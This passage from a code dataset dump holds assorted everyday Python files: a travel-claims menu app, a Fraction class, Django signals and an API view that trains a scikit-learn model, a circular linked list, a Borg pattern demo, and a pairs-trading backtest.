MileageAccumulator, ClaimAmountAccumulator))\n print()\n print(\" End of Report\")\n file.close()\n break\n\n Anykey = input(\"Press any key to continue.\")\n\n\n# This function will allow the user to graph monthly claim totals\ndef GraphClaimTotals():\n\n import numpy as np\n import matplotlib.pyplot as plt\n\n Jan = 0\n Feb = 0\n Mar = 0\n Apr = 0\n May = 0\n Jun = 0\n Jul = 0\n Aug = 0\n Sep = 0\n Oct = 0\n Nov = 0\n Dec = 0\n\n file = open(\"Claims.dat\", \"r\")\n\n for claims in file:\n ClaimList = claims.split(\",\")\n StartDate = ClaimList[4].strip()\n StartDate2 = StartDate.split('-')\n Month = StartDate2[1]\n ClaimAmount = float(ClaimList[11].strip())\n if Month == \"01\":\n Jan = Jan + ClaimAmount\n elif Month == \"02\":\n Feb = Feb + ClaimAmount\n elif Month == \"03\":\n Mar = Mar + ClaimAmount\n elif Month == \"04\":\n Apr = Apr + ClaimAmount\n elif Month == \"05\":\n May = May + ClaimAmount\n elif Month == \"06\":\n Jun = Jun + ClaimAmount\n elif Month == \"07\":\n Jul = Jul + ClaimAmount\n elif Month == \"08\":\n Aug = Aug + ClaimAmount\n elif Month == \"09\":\n Sep = Sep + ClaimAmount\n elif Month == \"10\":\n Oct = Oct + ClaimAmount\n elif Month == \"11\":\n Nov = Nov + ClaimAmount\n elif Month == \"12\":\n Dec = Dec + ClaimAmount\n\n XAxis = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n YAxis = [Jan, Feb, Mar, Apr, May, Jun, Jul, Aug, Sep, Oct, Nov, Dec]\n\n plt.plot(XAxis, YAxis)\n\n plt.xlabel('Month')\n plt.ylabel('Claim Amount')\n\n plt.title('Monthly Claim Totals')\n plt.grid(True)\n\n plt.show()\n\n Anykey = input(\"Press any key to continue.\")\n\n\ndef main():\n while True:\n print()\n print(\"NL Chocolate Company - Travel Claims Processing System\")\n print()\n print(\"1. Enter an Employee Travel Claim.\")\n print(\"2. Edit System Default Values.\")\n print(\"3. Print the Travel Claim Report.\")\n print(\"4. Graph Monthly Claim Totals.\")\n print(\"5. 
Quit Program.\")\n print()\n while True:\n Choice = int(input(\"Enter choice (1-5): \"))\n IsValid = BP.ValidIntegerNumber(Choice, 1, 5)\n if IsValid:\n Choice = int(Choice)\n break\n if Choice == 1:\n TravelClaim(ClaimNumber)\n elif Choice == 2:\n EditDefaultValues()\n elif Choice == 3:\n PrintTravelReport()\n elif Choice == 4:\n GraphClaimTotals()\n else:\n print(\"Thank you for using NL Chocolate Company's Travel Claim Software!\")\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"150163284","text":"from amath import gcd, trunc, digits, intQ, isComplex, digitsafterdecimal\nfrom Symbols import *\nfrom functools import total_ordering\nfrom decimal import Decimal, InvalidOperation\nimport inspect\n\n\ndef dectofr(x):\n # type: (float) -> Fraction\n \"\"\"\n Converts decimals to fractions\n :param x: decimal to convert\n :return: Fraction\n\n >>> dectofr(2.5)\n 5/2\n >>> dectofr(0.25)\n 1/4\n >>> dectofr(2.1)\n 21/10\n\n Does work for int\n\n >>> dectofr(5)\n 5/1\n \"\"\"\n # n = int(floor(x))\n # x -= n\n # if x < error:\n # # return (n, 1)\n # return Fraction(n, 1)\n # elif 1 - error < x:\n # # return (n+1, 1)\n # return Fraction(n + 1, 1)\n #\n # # The lower fraction is 0/1\n # lower_n = 0\n # lower_d = 1\n # # The upper fraction is 1/1\n # upper_n = 1\n # upper_d = 1\n # while True:\n # # The middle fraction is (lower_n + upper_n) / (lower_d + upper_d)\n # middle_n = lower_n + upper_n\n # middle_d = lower_d + upper_d\n # # If x + error < middle\n # if middle_d * (x + error) < middle_n:\n # # middle is our new upper\n # upper_n = middle_n\n # upper_d = middle_d\n # # Else If middle < x - error\n # elif middle_n < (x - error) * middle_d:\n # # middle is our new lower\n # lower_n = middle_n\n # lower_d = middle_d\n # # Else middle is our best fraction\n # else:\n # # return (n * middle_d + middle_n, middle_d)\n # # return \"{0}/{1}\".format(n*middle_d+middle_n,middle_d)\n # return Fraction(n * middle_d + middle_n, middle_d)\n calframe = inspect.getouterframes(inspect.currentframe(), 2)\n print(\"dectofr caller name: \", calframe[1])\n x = float(x)\n n = x\n d = 1\n dig = digitsafterdecimal(x)\n multiplier = 10 ** dig\n # print(n, d, dig, multiplier, n * multiplier, d * multiplier)\n return Fraction(int(n * multiplier), int(d * multiplier))\n\n\ndef frtodec(x):\n \"\"\"\n Converts Fraction to decimal\n :param x: Fraction to be converted\n :return: Decimal\n\n >>> frtodec(Fraction(1,2))\n 0.5\n >>> frtodec(Fraction(1,3))\n 0.3333333333333333\n \"\"\"\n if not isinstance(x, Fraction):\n raise TypeError(\"Argument must be a fraction\")\n return float(x.numerator) / float(x.denominator)\n\n\n\n@total_ordering\nclass Fraction:\n \"\"\"\n Fraction data type\n \"\"\"\n\n def __init__(self, n=0, d=1):\n \"\"\"\n Fraction initialization\n :param n: numerator\n :param d: denomenator\n :return:\n :raises ZeroDivisionError:\n\n Create a Fraction\n\n >>> Fraction(5,2)\n 5/2\n >>> Fraction(-5,2)\n -5/2\n >>> Fraction(5,-2)\n -5/2\n >>> Fraction(4,10)\n 2/5\n \"\"\"\n curframe = inspect.currentframe()\n calframe = inspect.getouterframes(curframe, 2)\n print(\"__init__ caller name: \", calframe[1])\n self.onum = n\n self.oden = d\n self.numerator = n / gcd(abs(n), abs(d))\n self.denominator = d / gcd(abs(n), abs(d))\n self.whole = 0\n if type(self.denominator) is not complex:\n self.denominator = 
int(self.denominator)\n        if type(self.numerator) is not complex:\n            self.numerator = int(self.numerator)\n        if (type(self.numerator) is not complex) and (type(self.denominator) is not complex):\n            if self.denominator < 0:\n                self.denominator = abs(self.denominator)\n                self.numerator *= -1\n        if self.denominator == 0:\n            raise ZeroDivisionError\n        self.value = n / d\n        self.whole = trunc(self.value)\n        self.attributes = {Attributes[0], Attributes[1]}\n\n    def __add__(self, other):\n        \"\"\"\n        Adds to values\n        :param other:\n        :return:\n\n        >>> Fraction(1,4) + Fraction(2,4)\n        3/4\n        >>> Fraction(1,2) + Fraction(3,4)\n        5/4\n        >>> Fraction(1,2) + 2\n        5/2\n        >>> Fraction(1,2) + 2.5\n        3/1\n        \"\"\"\n        ax = other\n        if not isinstance(other, Fraction):\n            ax = dectofr(other)\n        return Fraction(self.numerator * ax.denominator + self.denominator * ax.numerator,\n                        self.denominator * ax.denominator)\n\n    __radd__ = __add__\n\n    def __sub__(self, other):\n        # type: (object) -> Fraction\n        \"\"\"\n        Subtract a value from Fraction\n\n        :param other:\n        :return:\n\n        >>> Fraction(3, 4) - Fraction(1, 4)\n        1/2\n        >>> Fraction(7, 4) - Fraction(3 ,4)\n        1/1\n        >>> Fraction(6, 4) - 2\n        -1/2\n        >>> Fraction(11, 2) - 3.5\n        2/1\n\n        \"\"\"\n        dx = other\n        if not isinstance(other, Fraction):\n            dx = dectofr(other)\n        return Fraction(self.numerator * dx.denominator - self.denominator * dx.numerator,\n                        self.denominator * dx.denominator)\n\n    def __rsub__(self, other):\n        dx = other\n        if not isinstance(other, Fraction):\n            dx = dectofr(other)\n        # use the converted dx in the denominator too; 'other' may be a plain number\n        return Fraction(dx.numerator * self.denominator - self.numerator * dx.denominator,\n                        self.denominator * dx.denominator)\n\n    def __mul__(self, other):\n        # type: (object) -> Fraction\n        \"\"\"\n        Multiplication\n        :param other:\n        :return:\n\n        >>> Fraction(1,2) * Fraction(5,4)\n        5/8\n        >>> Fraction(1,2) * 4\n        2/1\n        >>> Fraction(1,3) * 2.5\n        5/6\n        \"\"\"\n        try:\n            other = float(other)\n        except ValueError:\n            return NotImplemented\n        except TypeError:\n            return NotImplemented\n        mx = dectofr(other)\n        return Fraction(self.numerator * mx.numerator, self.denominator * mx.denominator)\n\n    __rmul__ = __mul__\n\n    def __truediv__(self, other):\n        dx = other\n        if not isinstance(other, Fraction):\n            dx = dectofr(other)\n        return Fraction(self.numerator * dx.denominator, self.denominator * dx.numerator)\n\n    def __rtruediv__(self, other):\n        dx = other\n        if not isinstance(other, Fraction):\n            dx = dectofr(other)\n        return Fraction(dx.numerator * self.denominator, dx.denominator * self.numerator)\n\n    def __div__(self, other):\n        \"\"\"\n        Division\n        :param other:\n        :return:\n\n        Uses truediv\n\n        >>> Fraction(1,2) / Fraction(3,4)\n        2/3\n        >>> Fraction(1,2) / 2\n        1/4\n        >>> Fraction(1,4) / 0.5\n        1/2\n        \"\"\"\n        return self.__truediv__(other)\n\n    def __pow__(self, power, modulo=None):\n        y = pow(self.numerator, power)\n        z = pow(self.denominator, power)\n        if modulo is not None:\n            return Fraction(y, z) % modulo\n        return Fraction(y, z)\n\n    def __rpow__(self, other, modulo=None):\n        from amath.Computation.power import root\n        return pow(root(other, self.denominator), self.numerator)\n\n    def __str__(self):\n        return \"%s/%s\" % (self.numerator, self.denominator)\n\n    # def __cmp__(self, other):\n    #     \"\"\"\n    #     compare two values\n    #     :param other:\n    #     :return:\n    #\n    #     >>> Fraction(1,2) < Fraction(2,3)\n    #     True\n    #     >>> Fraction(2,3) == Fraction(4,6)\n    #     True\n    #     >>> Fraction(1,3) < 1\n    #     True\n    #     >>> Fraction(5,2) > 2.5\n    #     False\n    #     \"\"\"\n    #     if type(other) is float:\n    #         other = dectofr(other)\n    #     a = Fraction(self.numerator * other.denominator, self.denominator * 
other.denominator)\n    #     b = Fraction(other.numerator * self.denominator, self.denominator * other.denominator)\n    #     if a.onum > b.onum:\n    #         return 1\n    #     elif a.onum is b.onum:\n    #         return 0\n    #     else:\n    #         return -1\n\n    def __eq__(self, other):\n        if not isinstance(other, Fraction):\n            other = dectofr(other)\n        a = Fraction(self.numerator * other.denominator, self.denominator * other.denominator)\n        b = Fraction(other.numerator * self.denominator, self.denominator * other.denominator)\n        if a.onum == b.onum:\n            return True\n        else:\n            return False\n\n    def __lt__(self, other):\n        if not isinstance(other, Fraction):\n            other = dectofr(other)\n        a = Fraction(self.numerator * other.denominator, self.denominator * other.denominator)\n        b = Fraction(other.numerator * self.denominator, self.denominator * other.denominator)\n        if a.onum < b.onum:\n            return True\n        else:\n            return False\n\n    def __bool__(self):\n        \"\"\"\n        Non Zero (__bool__ is the Python 3 spelling of __nonzero__)\n        :return:\n\n        \"\"\"\n        if self != 0:\n            return True\n        else:\n            return False\n\n    def __repr__(self):\n        try:\n            return self.__str__()\n        except AttributeError:\n            return str(None)\n\n    def digits(self):\n        x = frtodec(self)\n        return digits(x)\n\n    def is_int(self):\n        if self.denominator == 1:\n            return True\n        else:\n            return False\n\n    def __trunc__(self):\n        return self.whole\n\n    def __float__(self):\n        \"\"\"\n        Convert to float\n        :return:\n\n        >>> float(Fraction(1,2))\n        0.5\n        >>> float(Fraction(1,25))\n        0.04\n        >>> float(Fraction(5,2))\n        2.5\n        \"\"\"\n        return frtodec(self)\n\n    def __mod__(self, other):\n        \"\"\"\n        Modulus\n        :param other:\n        :return:\n\n        >>> Fraction(1,2) % 2\n        1/2\n        >>> Fraction(1,2) % Fraction(1,3)\n        1/6\n        \"\"\"\n        z = trunc(self / other)\n        a = self - (other * z)\n        return a\n\n    def __abs__(self):\n        if self.numerator < 0:\n            return Fraction(-self.numerator, self.denominator)\n        else:\n            return self\n\n    def __neg__(self):\n        return Fraction(-self.numerator, self.denominator)\n\n    def __pos__(self):\n        return Fraction(self.numerator, self.denominator)\n\n\n@total_ordering\nclass Complex:\n\n    def __init__(self, value: complex = 0j):\n        self.imag = Decimal(value.imag)\n        self.real = Decimal(value.real)\n        # Decimal cannot represent a complex number; keep the original complex value\n        self.value = complex(value)\n        self.attributes = {Attributes[0], Attributes[1]}\n\n    def conjugate(self):\n        # Decimal does not support complex arithmetic, so build the conjugate explicitly\n        return complex(float(self.real), -float(self.imag))\n\n","sub_path":"datatypes.py","file_name":"datatypes.py","file_ext":"py","file_size_in_byte":10354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"449076353","text":"from django.db.models.signals import post_save, pre_delete, post_delete\nfrom django.dispatch import receiver\nfrom library_preparation.models import LibraryPreparation\nfrom pooling.models import Pooling\nfrom .models import Pool\n\n\n@receiver(post_save, sender=Pool)\ndef update_pool_name_size(sender, instance, created, **kwargs):\n    # Update the name only for a just created pool\n    if created:\n        instance.name = str(instance.id) + instance.name\n        instance.save()\n\n    # Update Pool Size\n    update_fields = kwargs.pop('update_fields')\n    if update_fields and update_fields == {'size'}:\n        libraries = instance.libraries.all()\n        samples = instance.samples.all()\n        instance.size += sum([l.sequencing_depth for l in libraries])\n        instance.size += sum([s.sequencing_depth for s in samples])\n        instance.save()\n\n\n@receiver(pre_delete, sender=Pool)\ndef delete_dependent_objects(sender, instance, **kwargs):\n    libraries = instance.libraries.all()\n    samples = instance.samples.all()\n\n    for library in libraries:\n        library.is_pooled = False\n        
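# Passing update_fields keeps the UPDATE statement narrow: only the\n        # is_pooled column is written back for each library and sample below.\n        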
library.save(update_fields=['is_pooled'])\n\n for sample in samples:\n sample.is_pooled = False\n sample.save(update_fields=['is_pooled'])\n\n # Delete all dependent Library Preparation and Pooling objects\n LibraryPreparation.objects.filter(sample__in=samples).delete()\n Pooling.objects.filter(library__in=libraries).delete()\n Pooling.objects.filter(sample__in=samples).delete()\n\n\n@receiver(post_delete, sender=Pool)\ndef delete_file(sender, instance, **kwargs):\n # Delete uploaded file after deleting a pool\n if instance.file:\n instance.file.delete(False)\n","sub_path":"index_generator/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"3896191","text":"# !/usr/bin/env python3\n# -*- coding:utf-8 -*- \n# @author: Shengjia Yan\n# @date: 2018-10-30 Tuesday\n# @email: i@yanshengjia.com\n# Copyright @ Shengjia Yan. All Rights Reserved.\n\"\"\"\nThis module contains the status codes for exceptions.\n\"\"\"\n\n\nstatus_code = {\n 'OK': 1,\n 'BAD_SRC': 101, # all candidate scores < -0.4\n}\n","sub_path":"utils/status_code.py","file_name":"status_code.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"411855219","text":"import Domain.ListController\nclass CircularList:\n\n def __init__(self, data, identifier):\n self.data = data\n self.nextNode = None\n self.prevNode = None\n self.identifier = identifier\n\n def insertAtPoint(self, data, head, tail, nodes):\n auxNode = head\n newNode = CircularList(data, head.identifier)\n\n if head.data is None:\n head = newNode\n tail = newNode\n head.nextNode = tail\n head.prevNode = tail\n tail.nextNode = head\n tail.prevNode = head\n nodes += 1\n return Domain.ListController.updateElements(head, tail, nodes)\n\n elif head.data[1] > newNode.data[1]:\n newNode.nextNode = head\n newNode.prevNode = tail\n head.prevNode = newNode\n tail.nextNode = newNode\n head = newNode\n nodes += 1\n return Domain.ListController.updateElements(head, tail, nodes)\n\n elif tail.data[1] < newNode.data[1]:\n tail.nextNode = newNode\n newNode.nextNode = head\n newNode.prevNode = tail\n head.prevNode = newNode\n tail = newNode\n nodes += 1\n return Domain.ListController.updateElements(head, tail, nodes)\n\n else:\n for x in range(0,nodes):\n if auxNode.data[1] < newNode.data[1]:\n auxNode = auxNode.nextNode\n else:\n auxNode = auxNode.prevNode\n break\n\n newNode.nextNode = auxNode.nextNode\n auxNode.nextNode = newNode\n newNode.prevNode = auxNode\n newNode.nextNode.prevNode = newNode\n tail = head.prevNode\n nodes += 1\n return Domain.ListController.updateElements(head, tail, nodes)\n\n'''\nExtra code\nNot tested with the project actual functionality\n\n def deleteNode(self, data, head, tail, nodes):\n\n auxNode = head\n if nodes != 0:\n if head.data == data:\n auxNode.prevNode.nextNode = auxNode.nextNode\n auxNode.nextNode.prevNode = auxNode.prevNode\n head = head.nextNode\n print(data, \" deleted\")\n nodes -= 1\n return Domain.ListController.updateElements(head, tail, nodes)\n elif tail.data == data:\n tail.prevNode.nextNode = tail.nextNode\n tail.nextNode.prevNode = tail.prevNode\n tail = tail.prevNode\n print(data, \" deleted\")\n nodes -= 1\n return Domain.ListController.updateElements(head, tail, nodes)\n else:\n while auxNode.nextNode != head:\n if auxNode.data == data:\n auxNode.prevNode.nextNode = auxNode.nextNode\n auxNode.nextNode.prevNode = 
auxNode.prevNode\n                        print(data, \" deleted\")\n                        nodes -= 1\n                        return Domain.ListController.updateElements(head, tail, nodes)\n                    auxNode = auxNode.nextNode\n                print(data, \"Not found\")\n                return\n        else:\n            print(\"Cannot delete, the list is empty\")\n            return\n\n    def updateElement(self, data, newData, head, tail, nodes):\n\n        auxNode = data\n        if nodes == 0:\n            print(\"Cannot update, the list is empty\")\n            return\n        for x in range(0,nodes):\n            if data == auxNode.data:\n                auxNode.data = newData\n                print(\"Value updated successfully\")\n                return Domain.ListController.updateElements(head, tail, nodes)\n            else:\n                auxNode = auxNode.nextNode\n        print(\"The inserted value doesn't coincide with any Node value\")\n        return\n\n\n    def insertAtTail(self, data, head, tail, nodes):\n\n        auxNode = head\n        newNode = CircularList(data)\n\n        if head.data is None:\n            head = newNode\n            tail = newNode\n            head.nextNode = tail\n            head.prevNode = tail\n            tail.nextNode = head\n            tail.prevNode = head\n            nodes += 1\n            return\n        else:\n            auxNode.prevNode.nextNode = newNode\n            newNode.nextNode = auxNode\n            newNode.prevNode = auxNode.prevNode\n            auxNode.prevNode = newNode\n            tail = head.prevNode\n            nodes += 1\n            return\n    \n    def insertAtHead(self, data, head, tail, nodes):\n\n        newNode = CircularList(data)\n\n        if head.data is None:\n            head = newNode\n            tail = newNode\n            head.nextNode = tail\n            head.prevNode = tail\n            tail.nextNode = head\n            tail.prevNode = head\n            nodes += 1\n            return\n\n        else:\n            newNode.nextNode = head\n            newNode.prevNode = tail\n            head.prevNode = newNode\n            tail.nextNode = newNode\n            head = newNode\n            nodes += 1\n            return\n    \n    def printList(self, head, tail, nodes):\n\n        auxNode = head\n        if nodes == 0:\n            print(\"The list is empty\")\n            return\n        elif nodes == 1:\n            print(\"(\", tail.data, \")<->\", head.data, \"<->(\", head.data, \")\")\n            return\n        else:\n            print(\"(\", tail.data, \")\", end=\"\")\n            for x in range(0, nodes):\n                print(\"<->\", auxNode.data, end=\" \")\n                auxNode = auxNode.nextNode\n            print(\"<->(\", head.data, \")\")\n            return\n'''","sub_path":"Domain/List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":5630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"351781384","text":"\"\"\"\ntest_sfissues.py - tests for the sfissues module\nauthor: nu11us \n\"\"\"\n\nimport unittest\nfrom mock import MagicMock\nfrom modules import sfissues\nimport web\n\n\nclass TestSFIssues(unittest.TestCase):\n    def setUp(self):\n        self.phenny = MagicMock()\n        self.input = MagicMock()\n\n    def test_bugs(self):\n        self.phenny.config.sf_issues_url = \"https://sourceforge.net/p/apertium/news/feed.rss\"\n        self.input.nick = \"bbc\"\n        sfissues.bugs(self.phenny, self.input)\n        out = self.phenny.say.call_args[0][0]\n        self.assertTrue(\"Basque-English 0.3.0 Released\" in out)","sub_path":"modules/test/test_sfissues.py","file_name":"test_sfissues.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"495678168","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n*What is this pattern about?\nThe Borg pattern (also known as the Monostate pattern) is a way to\nimplement singleton behavior, but instead of having only one instance\nof a class, there are multiple instances that share the same state.\nIn other words, the focus is on sharing state instead of sharing\ninstance identity.\n\n*What does this example do?\nTo understand the implementation of this pattern in Python, it is\nimportant to know that, in Python, instance attributes are stored in\nan attribute dictionary called __dict__. Usually, each instance will\nhave its own dictionary, but the Borg pattern modifies this so that\nall instances have the same dictionary.\nIn this example, the __shared_state attribute will be the dictionary\nshared between all instances, and this is ensured by assigning\n__shared_state to the __dict__ variable when initializing a new\ninstance (i.e., in the __init__ method). Other attributes are usually\nadded to the instance's attribute dictionary, but, since the attribute\ndictionary itself is shared (it is __shared_state), all other\nattributes will also be shared.\nTherefore, when the attribute self.state is modified using instance\nrm2, the value of self.state in instance rm1 also changes. The same\nhappens if self.state is modified using rm3, which is an instance\nfrom a subclass.\nNotice that even though they share attributes, the instances are\ndifferent, as shown by their ids.\n\n*Where is the pattern practically used?\nSharing state is useful in applications like managing database\nconnections:\nhttps://github.com/onetwopunch/pythonDbTemplate/blob/master/database.py\n\n*References:\nhttps://fkromer.github.io/python-pattern-references/design/#singleton\n\n*TL;DR80\nProvides singleton-like behavior sharing state between instances.\n\"\"\"\n\n\nclass Borg(object):\n    __shared_state = {}\n\n    def __init__(self):\n        self.__dict__ = self.__shared_state\n        self.state = 'Init'\n\n    def __str__(self):\n        return self.state\n\n\nclass YourBorg(Borg):\n    pass\n\n\nif __name__ == '__main__':\n    rm1 = Borg()\n    rm2 = Borg()\n\n    rm1.state = 'Idle'\n    rm2.state = 'Running'\n\n    print('rm1: {0}'.format(rm1))\n    print('rm2: {0}'.format(rm2))\n\n    rm2.state = 'Zombie'\n\n    print('rm1: {0}'.format(rm1))\n    print('rm2: {0}'.format(rm2))\n\n    print('rm1 id: {0}'.format(id(rm1)))\n    print('rm2 id: {0}'.format(id(rm2)))\n\n    rm3 = YourBorg()\n\n    print('rm1: {0}'.format(rm1))\n    print('rm2: {0}'.format(rm2))\n    print('rm3: {0}'.format(rm3))\n\n### OUTPUT ###\n# rm1: Running\n# rm2: Running\n# rm1: Zombie\n# rm2: Zombie\n# rm1 id: 140732837899224\n# rm2 id: 140732837899296\n# rm1: Init\n# rm2: Init\n# rm3: Init\n","sub_path":"patterns/creational/borg.py","file_name":"borg.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"589089308","text":"\n\nimport pandas as pd\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport statsmodels as sm\nfrom statsmodels.tsa.stattools import adfuller\n\npath = os.getcwd()\n\nprices = pd.read_csv(path + '/close.csv')\ndata = pd.DataFrame()\nprices['Date'] = pd.to_datetime(prices['Date'])\nprices.set_index('Date',inplace = True)\n# take the ticker list from the price columns ('data' is still an empty frame here)\ntickers = list(prices.columns.values)\ndata = prices/prices.iloc[0]\ntrading_data = data.loc[data.index > '2017-09-08']\ndata = data.loc[data.index < '2017-09-09']\nprices = prices.loc[prices.index > '2017-09-09']\n\ndef 
build_portfolio(trade_list, trading_data = trading_data):\n index_list = trading_data.index.tolist()\n portfolio = pd.DataFrame(index = trading_data.index.values, columns = ['Short','Long','ShortR','LongR','Trading'])\n l = trade_list[1]\n trade_list = trade_list[0]\n for i in range(len(trade_list)):\n start = trade_list['Start'][i]\n end = trade_list['End'][i]\n short = trade_list['Short'][i]\n lon = trade_list['Long'][i]\n di = index_list.index(start)\n di2 = index_list.index(end)\n for j in range(di2 - di + 1):\n date_index = di + j\n dt = index_list[date_index]\n portfolio['Short'][dt] = trading_data[short][dt]/trading_data[short][index_list[di]]\n portfolio['Long'][dt] = trading_data[lon][dt]/trading_data[lon][index_list[di]]\n portfolio['Short'][dt] = trading_data[short][dt]/trading_data[short][index_list[di]]\n portfolio['Long'][dt] = trading_data[lon][dt]/trading_data[lon][index_list[di]]\n portfolio['Trading'][dt] = 1\n\n portfolio.fillna(value = 0, axis = 0)\n for j in range(1, len(portfolio)):\n if portfolio.iloc[j-1]['Short'] > 0:\n portfolio.iloc[j]['ShortR'] = -(portfolio.iloc[j]['Short'] - portfolio.iloc[j-1]['Short'])/portfolio.iloc[j-1]['Long']\n portfolio.iloc[j]['LongR'] = (portfolio.iloc[j]['Long'] - portfolio.iloc[j-1]['Long'])/portfolio.iloc[j-1]['Long']\n else:\n portfolio.iloc[j]['ShortR'] = 0\n portfolio.iloc[j]['LongR']= 0\n portfolio['Total'] = portfolio['ShortR'] + portfolio['LongR']\n portfolio.fillna(0, inplace = True)\n return (portfolio, l)\n\ndef analyze_portfolio(pairs):\n i = 0\n df = (build_portfolio(trading_signals(pairs[i][0], pairs[i][1]))[0])\n trade_count = build_portfolio(trading_signals(pairs[i][0], pairs[i][1]))[1]\n for i in range(1, len(pairs)):\n df = df + (build_portfolio(trading_signals(pairs[i][0], pairs[i][1])))[0]\n trade_count += build_portfolio(trading_signals(pairs[i][0], pairs[i][1]))[1]\n df_short = df['ShortR']/df['Trading']\n df_long = df['LongR']/df['Trading']\n df_final = pd.concat([df_short, df_long], axis=1)\n df_final.columns = ['Short Return','Long Return']\n df_final.index.name = 'Date'\n df_final['Total'] = df_final['Short Return'] + df_final['Long Return']\n df_final.fillna(0, inplace = True)\n arithemtic_daily_mean = np.mean(df_final['Total'])\n annualized_return = (1+arithemtic_daily_mean)**250 - 1\n annualized_std = np.std(df_final['Total'])*np.sqrt(250)\n sharpe_ratio = annualized_return/annualized_std\n return [annualized_return, annualized_std, sharpe_ratio, trade_count]\n\nprint(analyze_portfolio([['HON','NEE'], ['TXN','SYK'],['BDX','SYK'], ['HON','DHR'],['JPM','PNC']]))\n\n\n","sub_path":"statarb/trading.py","file_name":"trading.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"627147995","text":"from django.shortcuts import render\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn import pipeline,preprocessing,metrics,model_selection,ensemble\nfrom sklearn_pandas import DataFrameMapper\nfrom sklearn import impute\nfrom sklearn.impute import SimpleImputer\nimport joblib as jb\n\n\n# Create your views here.\n\n# from . 
import service\n# from django.http import HttpResponse\n\n# def gett(request):\n# #article_data = service.get_data.all()\n# print(service.article_data)\n# return render(request, 'index.html', article_data)\n\n \n# import os\n# import requests\n# from requests.auth import HTTPBasicAuth\n\n# def api(request):\n# Company = request.POST.get('Company')\n# Position = request.POST.get('position')\n\n# url = os.environ.get(\"URL\", 'http://myhost:port/projectname/api/addposition?compName=Google&category=Developer')\n# url = \"%s\" % (url)\n# body = {\"Company\" : \"%s\" % Company, \"Position\" : \"%s\" % Position}response = requests.post(url, auth=HTTPBasicAuth('USER', 'PASSWORD'), headers={'Content-Type': 'application/json'}, json=body)\n# if response.status_code == 200:\n# print(\"Code 200\")\n# else:\n# print(\"Code not 200\")\n\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom django.shortcuts import render\nimport requests\nimport csv\nfrom . serializers import ApiSerializer\nfrom . models import Apimodel\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\n\n\n@api_view(['POST'])\ndef saveapi(request):\n\tif request.method =='POST':\n\t\ta=request.data\n\t\tprint(a)\n\t\tdata=pd.read_csv('datagas.csv')\n\t\tsaveserialize= ApiSerializer(data=request.data)\n\t\tmapper = DataFrameMapper([(['Quiz','sampletest','playing','sleeping','learning'], preprocessing.StandardScaler())])\n\t\tpipeline_obj = pipeline.Pipeline([('mapper',mapper),(\"model\", ensemble.RandomForestRegressor())])\n\t\t# data.columns\n\t\tX=['Quiz', 'sampletest', 'playing', 'sleeping','learning']\n\t\tY=['Total']\n\t\tpipeline_obj.fit(data[X],data[Y].values.ravel())\n\t\t#print(pipeline_obj.predict(data[X]))\n\t\tjb.dump(pipeline_obj,'RFModelforMPG.pkl')\n\t\tmodelReload=jb.load('RFModelforMPG.pkl')\n\t\ttestDtaa=pd.DataFrame({'x':request.data}).transpose()\n\t\tprint(testDtaa)\n\t\tif saveserialize.is_valid():\n\t\t\tsaveserialize.save()\n\t\t\tprint(request.data)\n\t\t\treturn Response(modelReload.predict(testDtaa)[0],status=status.HTTP_201_CREATED)\n\t\t\treturn Response(modelReload.predict(testDtaa)[0],status=status.HTTP_400_BAD_REQUEST)\n\t\t\t\n\n\n\n\n# def home(request):\n# \tresponse = requests.get('http://jsonplaceholder.typicode.com/users/')\n# \tgeodata = response.json()\n# \tprint([d['id'] for d in geodata if 'id' in d])\n# \tprint([d['name'] for d in geodata if 'name' in d])\n# \tprint([d['username'] for d in geodata if 'username' in d])\n# \tprint([d['email'] for d in geodata if 'email' in d])\n# \tout=zip([d['id'] for d in geodata if 'id' in d],[d['name'] for d in geodata if 'name' in d],[d['username'] for d in geodata if 'username' in d],[d['email'] for d in geodata if 'email' in d])\n# \twith open('outdatacsv.csv', 'w',newline='') as file:\n# \t\twriter = csv.writer(file)\n# \t\twriter.writerow(['Quiz','sampletest','playing','sleeping','learning'])\n# \t\twriter.writerows([(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# \t\t\t(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),(2,20,3,2,1),\n# 
